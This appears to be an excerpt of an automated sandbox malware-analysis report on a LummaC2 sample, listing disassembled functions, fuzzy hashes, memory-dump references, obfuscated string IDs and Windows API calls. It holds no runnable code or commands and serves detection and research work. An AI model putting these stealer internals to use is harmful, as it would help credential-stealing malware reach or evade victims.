                                              • Opcode ID: 3d4cc2720217adb35ab01d1b754babaf9c04c9eee622812c9bc0d9981137e950
                                              • Instruction ID: 5a8476e05fc140c76daf3574adebf747540a4a081690877bd4137d941f3cc67c
                                              • Opcode Fuzzy Hash: 3d4cc2720217adb35ab01d1b754babaf9c04c9eee622812c9bc0d9981137e950
                                              • Instruction Fuzzy Hash: 4841907000C3948ED301EF78A5893AFBFE0AB92314F05592DE4C597282D7B9868CD763
                                              Function 00DFB330 Relevance: 11.8, Strings: 9, Instructions: 503COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 3VWT$6B>@$>N4L$?J4H$M*C($^"Q $^.U,$e>K<$i2f0
                                              • API String ID: 0-2659819307
                                              • Opcode ID: 4e28bc82c008d61fb107412bc90b2a2e1e9e463b0861e97bb7c549b56df9c74f
                                              • Instruction ID: 1a7b1f3e0e4f3c640c762d90cb4b104ea4dd03e2861996abb249c1225691195f
                                              • Opcode Fuzzy Hash: 4e28bc82c008d61fb107412bc90b2a2e1e9e463b0861e97bb7c549b56df9c74f
                                              • Instruction Fuzzy Hash: 7B12AAB1201B05CFD3248F26D899BA7BBE5FB45314F008A2CD5AB9B6A1D7B4A409CF50
                                              Function 00E11BF0 Relevance: 10.4, Strings: 8, Instructions: 426COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $w9q$*O$I$-C!M$3ga$4{;u$89$MO$s}
                                              • API String ID: 0-4109348952
                                              • Opcode ID: 469610386e9e130e566160deffeca5965b81de9de5f4b91836362665587acfae
                                              • Instruction ID: 216545c8ea9509ec79bf38c2902b09795bc5b71a807cb39c46faa4f4d6f4eb61
                                              • Opcode Fuzzy Hash: 469610386e9e130e566160deffeca5965b81de9de5f4b91836362665587acfae
                                              • Instruction Fuzzy Hash: A9C113756083408BD724CF24C8527ABB7F2FF95318F08A96CE9858F390E7789945CB96
                                              Function 00E072C9 Relevance: 10.0, APIs: 4, Strings: 1, Instructions: 1232COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 2v
                                              • API String ID: 0-665061728
                                              • Opcode ID: 14aaadc5267bb02bfde290e5494d3c85d8ded7ed0abc90d3a5385835dd7fe215
                                              • Instruction ID: a79aa84e27eacd213406c138bff8b47b9190ba4df72cc7a9afeca10bdabae0b5
                                              • Opcode Fuzzy Hash: 14aaadc5267bb02bfde290e5494d3c85d8ded7ed0abc90d3a5385835dd7fe215
                                              • Instruction Fuzzy Hash: 12A29A75A04B018FD725CF29C890B62BBF2FF85314F198A9DD4D68B7A1DB34A846CB50
                                              Function 00E1C4A0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 143COMMON
                                              Download Yara Rule
                                              APIs
                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 00E1C5C2
                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,?,?), ref: 00E1C647
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID: EnvironmentExpandStrings
                                              • String ID: 8UVW$A)E+$B-
                                              • API String ID: 237503144-574032660
                                              • Opcode ID: c20afb510dab540fb4a30c77b077c13f8c457ceeb4fb73265bc491f9c267cc8a
                                              • Instruction ID: ebdd1a10d10cc67d089ba45c20f526999b7a4cb8908b27ee2ab442b7824999fc
                                              • Opcode Fuzzy Hash: c20afb510dab540fb4a30c77b077c13f8c457ceeb4fb73265bc491f9c267cc8a
                                              • Instruction Fuzzy Hash: E141DDB124C3549FE3248F20A89579FBBE2FBC5318F555A2CFA959B2D1C7718409CB82
                                              Function 00DF97B0 Relevance: 7.9, Strings: 6, Instructions: 401COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %1[m$74$H$R$Jdy$y
                                              • API String ID: 0-571391843
                                              • Opcode ID: 7bed076e94966371b7358ca33232c82f17db0d72c3406526fb0ddda46e746f22
                                              • Instruction ID: ddd02f40e75f8e31f7ff5e9142fd153acb1f6272d61a5662735c1f8599052347
                                              • Opcode Fuzzy Hash: 7bed076e94966371b7358ca33232c82f17db0d72c3406526fb0ddda46e746f22
                                              • Instruction Fuzzy Hash: FFC1E37164C3448BD318DF25D8A176BBBE5EFC2314F14896DE2D28B391C639C509CB66
                                              Function 00E34560 Relevance: 7.7, Strings: 6, Instructions: 161COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ]$^$_$q$r$s
                                              • API String ID: 0-2489591387
                                              • Opcode ID: 0f75e328841ccc03c93254b016c9416ebe5b564b7dc53aa819eb4c65bc48c22f
                                              • Instruction ID: 7d1114758760f6076937a16d68c9bee8744cc6b01796fc52c3d7f0f0947f2576
                                              • Opcode Fuzzy Hash: 0f75e328841ccc03c93254b016c9416ebe5b564b7dc53aa819eb4c65bc48c22f
                                              • Instruction Fuzzy Hash: EB5136B260C3908FD3148A78C89831BBFD19BD6328F09866DE1E5973C2D2B8D905C793
                                              Function 00E07703 Relevance: 6.8, APIs: 4, Instructions: 846COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6d2ca7cd142508b826b9b737b315ef1ebd5f67abdadef39b2119a1e3626dac38
                                              • Instruction ID: 7eb91d23eb57d8b9f63ae90413ef0568b34010019c4f0c2c010ace332bd43067
                                              • Opcode Fuzzy Hash: 6d2ca7cd142508b826b9b737b315ef1ebd5f67abdadef39b2119a1e3626dac38
                                              • Instruction Fuzzy Hash: 1862BD75A04B018FD724CF29C890B62B7F2FF85314B198A9DD4D68B7A5EB34E846CB50
                                              Function 00DF4260 Relevance: 6.7, Strings: 5, Instructions: 477COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: )$)$IDAT$IEND$IHDR
                                              • API String ID: 0-3469842109
                                              • Opcode ID: 7d7919048267dcd36069a5edefc78129acd34931929b1490cdd6cf79c6a1c7fd
                                              • Instruction ID: f279b45e393f157c8c7d160c9e933cd7a4156b52568a30d68a5192f10328cfb2
                                              • Opcode Fuzzy Hash: 7d7919048267dcd36069a5edefc78129acd34931929b1490cdd6cf79c6a1c7fd
                                              • Instruction Fuzzy Hash: 540235716083889FD704CF29D89076B7BE1EF85304F19C56CEA859B392D379D909CBA2
                                              Function 00E08B3B Relevance: 6.6, Strings: 5, Instructions: 397COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @6F$2H5N$3D3J$4p9v$az)"
                                              • API String ID: 0-2116903869
                                              • Opcode ID: 83f80cc6f4f077c17f8905f8911c2243940b04489ab33767af012e0f3bdd2b61
                                              • Instruction ID: 70972ab9149e15f49770356e2c9df31d4729628a33243d4afedb9d928fd7fcae
                                              • Opcode Fuzzy Hash: 83f80cc6f4f077c17f8905f8911c2243940b04489ab33767af012e0f3bdd2b61
                                              • Instruction Fuzzy Hash: 0BE19AB06007008FD724CF25C591B62BBF2FF95314B1996ADC49A8F7A6DB75E881CB50
                                              Function 00DFCE48 Relevance: 6.6, Strings: 5, Instructions: 348COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: '&*F$2B61$5195$BA19$C535
                                              • API String ID: 0-2440990713
                                              • Opcode ID: c5b8fe60b74b22f9b21ed28f00d3aedc1645c0a8ff6d2eb8920dae7b64e5cd7b
                                              • Instruction ID: 770c5e4d10570992d9e9cc5c4b405885b485de099f9b378252d58c3fee2beee7
                                              • Opcode Fuzzy Hash: c5b8fe60b74b22f9b21ed28f00d3aedc1645c0a8ff6d2eb8920dae7b64e5cd7b
                                              • Instruction Fuzzy Hash: E3C1E27254C3928BE3309F24D865BFBBBE1BF85318F094A3DC5D89B282D77845058796
                                              Function 00E198B0 Relevance: 6.6, Strings: 5, Instructions: 305COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID: 245*$245*$avub$x${'~s
                                              • API String ID: 2994545307-4196737153
                                              • Opcode ID: 7eed1a896a51676b816030f323eb48b527db55ee2a234768b8e3400fcf3d4213
                                              • Instruction ID: 00ca2a3429d64f21211a8c2314d61b16a1ecdd3cd44335f10fb12423ab386ccd
                                              • Opcode Fuzzy Hash: 7eed1a896a51676b816030f323eb48b527db55ee2a234768b8e3400fcf3d4213
                                              • Instruction Fuzzy Hash: 208137B160C3005BD7109F28D8A5BBBB7E6EFC1318F18962CE486A7292E335DC49C756
                                              Function 00E31D40 Relevance: 6.3, Strings: 5, Instructions: 50COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: #\]R$'@=F$;DwZ$=L9B$?X%^
                                              • API String ID: 0-1288978301
                                              • Opcode ID: b6c2b19ab95c3509ebe3738913a9a431c9c51501fa5047b35755b4d1d9490087
                                              • Instruction ID: 2f0630a0c4b1f58a0c2c14cfe20cf6454ae109f79a03ef794e516a90df628112
                                              • Opcode Fuzzy Hash: b6c2b19ab95c3509ebe3738913a9a431c9c51501fa5047b35755b4d1d9490087
                                              • Instruction Fuzzy Hash: E511E5B19083509BD704DF25ED7476BBAB7AFD6308F05D82DD0825B244CA358507CBD2
                                              Function 00E0A580 Relevance: 6.2, APIs: 2, Strings: 1, Instructions: 941COMMON
                                              Download Yara Rule
                                              APIs
                                              • FreeLibrary.KERNEL32(?), ref: 00E0AA37
                                              • FreeLibrary.KERNEL32(?), ref: 00E0AA74
                                                • Part of subcall function 00E323F0: LdrInitializeThunk.NTDLL(00E35730,?,00000018,?,?,00000018,?,?,?), ref: 00E3241E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID: FreeLibrary$InitializeThunk
                                              • String ID: M/(
                                              • API String ID: 764372645-1344302542
                                              • Opcode ID: d99e143d5d53a370de18abe943eeef056c85c2c1e543c9953243f525b98bfd20
                                              • Instruction ID: 80786a7c90f2b30fb1ee4bf983347f3b8f6f25ee1bb0c4034c8308ac400559cf
                                              • Opcode Fuzzy Hash: d99e143d5d53a370de18abe943eeef056c85c2c1e543c9953243f525b98bfd20
                                              • Instruction Fuzzy Hash: 6462F370608345AFE724CB25DC55B2BBBE2FBD4318F18962CE495A72E1E3719C85CB42
                                              Function 00E1B770 Relevance: 6.0, APIs: 2, Strings: 1, Instructions: 783COMMON
                                              Download Yara Rule
                                              APIs
                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 00E1B818
                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 00E1B87D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID: EnvironmentExpandStrings
                                              • String ID: U1s3
                                              • API String ID: 237503144-1140646920
                                              • Opcode ID: d2f5956faf934a79b1a58df5b9e39b042fb70c0ef60dbe48db1872a8a8106458
                                              • Instruction ID: 63f5a71b2ca8b1befcd286f32b1b3fb8f3b4c9da8f03898580f0e73e206bc40b
                                              • Opcode Fuzzy Hash: d2f5956faf934a79b1a58df5b9e39b042fb70c0ef60dbe48db1872a8a8106458
                                              • Instruction Fuzzy Hash: 3642CCB150C3458FD724DF68D8817AFBBF1EF85304F04882CE59A9B292E7749949CB92
                                              Function 00E31250 Relevance: 5.5, Strings: 4, Instructions: 543COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID: S"(w$S"(w$ctqv$f
                                              • API String ID: 2994545307-1437221927
                                              • Opcode ID: 9a25fd278698b6537da00e273f67cdf3ae1c7b9f263a714e1682626df12d3ce3
                                              • Instruction ID: 6a77bdd58ba43f6914f6905164fb82ec4846e9be343ffcb0cc8dac3f1623e42e
                                              • Opcode Fuzzy Hash: 9a25fd278698b6537da00e273f67cdf3ae1c7b9f263a714e1682626df12d3ce3
                                              • Instruction Fuzzy Hash: D312F1706083419FD724CF19C899B6ABFE1EB84318F189AADF4A1A7391D371D805CB82
                                              Function 00E21AB0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID: FreeLibrary
                                              • String ID: " ,9$"/)"
                                              • API String ID: 3664257935-73263347
                                              • Opcode ID: dea6857669438a35cfc2215225cf03a6a169f4ae914388bf197dff18cdbfc1a1
                                              • Instruction ID: e34dd759ef56a3e97c338f20c8ca3e203fff1b70a857adbc8545abfb7b24ff01
                                              • Opcode Fuzzy Hash: dea6857669438a35cfc2215225cf03a6a169f4ae914388bf197dff18cdbfc1a1
                                              • Instruction Fuzzy Hash: 5451CC716483A1CBE3348B25DC127EBBFE1AFE2300F18559DE0D9AB291D77849018762
                                              Function 00DF92F0 Relevance: 5.4, Strings: 4, Instructions: 414COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: "*&$1+G)$;'+!$Y_{z
                                              • API String ID: 0-2757149655
                                              • Opcode ID: 0af95f20d54259a6394965f00b502898db13bd609d7b49a63073dc5c149c30f9
                                              • Instruction ID: 00aa899b7e75fbdbba3ca9278c18b5bd35351be74e5905d4d212abe2fc18d3d7
                                              • Opcode Fuzzy Hash: 0af95f20d54259a6394965f00b502898db13bd609d7b49a63073dc5c149c30f9
                                              • Instruction Fuzzy Hash: 23C1E6B150C3948BD315CF2984A07ABFFE1AF93304F19895CE1D54B392D3758909CBA2
                                              Function 00E27A20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 161COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID: MetricsSystem
                                              • String ID:
                                              • API String ID: 4116985748-3916222277
                                              • Opcode ID: ba752c7425e238ca873e0d231eb84f22c09096a38f6a683e86821e0df43b83ec
                                              • Instruction ID: 96f04be052949af1553dab601033c4dbe636d48c4d761fb3b93331635f9fa616
                                              • Opcode Fuzzy Hash: ba752c7425e238ca873e0d231eb84f22c09096a38f6a683e86821e0df43b83ec
                                              • Instruction Fuzzy Hash: 4BA15CB05093858FD370DF29C98979AFFE0BBC5308F60692DE599AB250D7B59448CF82
                                              Function 00DFEB5F Relevance: 5.3, Strings: 4, Instructions: 334COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
